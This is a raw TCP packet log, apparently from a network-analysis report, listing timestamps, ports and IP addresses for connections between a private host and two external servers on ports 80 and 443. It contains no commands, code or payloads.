                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841681957 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841691971 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841711044 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841726065 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841983080 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.842037916 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.842148066 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.842195988 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.842391014 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.842437983 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.881155014 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.881181002 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.881198883 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.881279945 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.881306887 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.881330967 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.881347895 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962219000 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962280989 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962280989 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962299109 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962321997 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962341070 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962493896 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962511063 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962527037 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962533951 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962544918 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962554932 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962583065 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962636948 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962841988 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962897062 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.495359898 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.495373964 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.496762991 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.496831894 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.496855021 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.537586927 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.619513988 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.619546890 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.619615078 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.619683981 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.619713068 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.621139050 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.621206999 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.621221066 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.621238947 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.621278048 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.662602901 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.737431049 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.737473965 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.737548113 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.737576962 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.737622023 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.738537073 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.738557100 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.738615990 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.738629103 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.787611008 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.855562925 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.855581045 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.855616093 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.855653048 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.855688095 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.856345892 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.856359005 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.856386900 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.856403112 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.856456041 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.974054098 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.974071026 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.974163055 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.974194050 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.975366116 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.975411892 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.975433111 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.975452900 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.975467920 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.977140903 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.977204084 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:33.977216959 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.021966934 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.094059944 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.094079018 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.094167948 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.094189882 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.094247103 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.095643997 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.095657110 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.095724106 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.095740080 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.146960974 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.212224007 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.212245941 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.212280989 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.212342024 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.212438107 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.214010954 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.214020014 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.214046955 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.214091063 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.214124918 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.746579885 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.746598005 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.746670008 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.746697903 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.748100042 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.748169899 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.748176098 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.749706030 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.749771118 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.749775887 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.751961946 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.752031088 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.752041101 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.753739119 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.753818035 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.753823996 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.754502058 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.754559994 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.754565954 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.756922960 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.757010937 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.757018089 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.758631945 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.758708000 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.758713961 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:34.759406090 CET44349706142.215.209.78192.168.2.8
Timestamp                          Source Port  Dest Port  Source IP        Dest IP
Nov 18, 2024 16:52:34.759468079 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:34.759474993 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:34.760373116 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:34.760440111 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:34.760446072 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:34.761344910 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:34.761404991 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:34.761411905 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:34.763127089 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:34.763180971 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:34.763191938 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:34.803240061 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:34.808626890 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:34.808640957 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:34.808729887 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:34.808744907 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:34.811439991 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:34.811451912 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:34.811533928 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:34.811554909 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:34.853852034 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:34.853955984 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:34.853995085 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:34.896986008 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:34.947175980 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:34.947191954 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:34.947235107 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:34.947274923 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:34.947397947 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:34.947561026 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:34.947571993 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:34.947613955 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:34.947626114 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:34.947679996 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:34.949371099 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:34.949382067 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:34.949476957 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:34.949513912 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:34.990715981 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.046459913 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.046480894 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.046575069 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.046581030 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.046638012 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.047960043 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.047985077 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.048049927 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.048079014 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.048094988 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.065311909 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.065434933 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.065435886 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.065469027 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.065521002 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.092310905 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.092328072 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.092396975 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.092417002 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.092506886 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.165621042 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.165636063 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.165704012 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.165736914 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.184079885 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.184165001 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.184190035 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.185286045 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.185349941 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.185354948 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.185365915 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.185420990 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.283838987 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.283999920 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.284038067 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.302696943 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.302798033 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.302828074 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.303158045 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.303168058 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.303255081 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.303267002 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.330039024 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.330137968 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.330167055 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.381381035 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.403728008 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.403745890 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.403789997 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.403832912 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.403908014 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.425348997 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.425389051 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.425411940 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.425441027 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.425501108 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.425532103 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.426902056 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.426923037 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.426974058 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.426991940 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.427021980 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.448919058 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.448935032 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.449043036 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.449093103 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.490794897 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.522819042 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.522834063 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.522876978 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.522905111 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.522960901 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.544769049 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.544785023 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.544866085 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.544887066 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.545362949 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.545372963 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.545434952 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.545444965 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.546941996 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.546999931 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.547032118 CET  49706  443  192.168.2.8  142.215.209.78
Nov 18, 2024 16:52:35.547044992 CET  443  49706  142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:35.547063112 CET  49706  443  192.168.2.8  142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.600115061 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.641374111 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.641410112 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.641448021 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.641508102 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.641551971 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.663116932 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.663130999 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.663243055 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.663266897 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.663839102 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.663850069 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.663921118 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.663928986 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.664839029 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.664899111 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.664910078 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.664916992 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.664958954 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.734512091 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.734534979 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.734636068 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.734675884 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.781512022 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.781631947 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.781699896 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.782397032 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.782416105 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.782474041 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.782494068 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.782522917 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.783956051 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.783979893 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.784035921 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.784053087 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.806333065 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.806430101 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.806453943 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.806473017 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.806505919 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.850101948 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.879262924 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.879278898 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.879307032 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.879352093 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.879416943 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.938570023 CET44349706142.215.209.78192.168.2.8
